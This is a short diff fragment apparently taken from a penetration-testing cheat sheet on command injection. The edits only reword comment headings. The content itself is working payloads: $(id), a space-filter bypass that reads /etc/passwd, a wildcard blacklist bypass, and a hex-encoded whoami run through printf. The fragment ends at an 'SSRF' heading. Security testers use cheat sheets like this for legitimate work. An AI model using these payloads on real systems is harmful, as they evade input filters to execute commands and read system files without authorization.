 $(id)

-# Bypass spaces
+# Bypass space filters

 cat</etc/passwd

-# Bypass blacklists
+# Bypass character blacklists

-/bin/c?t /etc/passwd # wildcard
+/bin/c?t /etc/passwd # use wildcards

-$(printf "\x77\x68\x6f\x61\x6d\x69") # hex encoding
+$(printf "\x77\x68\x6f\x61\x6d\x69") # hex encode the command

 SSRF